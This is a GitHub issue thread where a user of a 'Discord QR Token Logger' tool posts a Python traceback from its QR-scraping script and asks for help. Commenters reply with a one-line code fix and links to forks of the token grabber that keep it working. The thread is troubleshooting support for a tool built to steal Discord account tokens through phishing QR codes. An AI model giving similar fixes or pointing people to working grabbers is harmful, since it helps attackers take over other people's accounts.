### ISSUE TITLE
Uhhh help please

### ISSUE THREAD

**Issue by Vuxst** [9P9/Discord-QR-Token-Logger#6]
[!] QR Code Token Logger Generator

C:\Users\eeee\OneDrive\Desktop\Discord-QR-Token-Logger-main\qr_generator.py:37: DeprecationWarning: executable_path has been deprecated, please pass in a Service object
  driver = webdriver.Chrome(options=options, executable_path=r'chromedriver.exe')
[?] Awaiting Page to Load!
[*] Page loaded.
Traceback (most recent call last):
  File "C:\Users\eeee\OneDrive\Desktop\Discord-QR-Token-Logger-main\qr_generator.py", line 99, in <module>
    main()
  File "C:\Users\eeee\OneDrive\Desktop\Discord-QR-Token-Logger-main\qr_generator.py", line 49, in main
    qr_code = div.find('img')['src']
AttributeError: 'NoneType' object has no attribute 'find'

**Comment by HeroBaskan** [comment]
Hi,

Try to change line 49 to:

qr_code = soup.find('img')['src']

**Comment by the-cult-of-integral** [comment]
Try [this fork](https://github.com/the-cult-of-integral/Discord-QR-Token-Logger). Your issue is that the QR code class name has changed: this fork uses regular expressions to avoid this becoming an issue.

**Comment by ThatTSGuy** [comment]
Use this one, it gets rid of selenium: https://github.com/ThatTSGuy/discord-qr-token-grabber
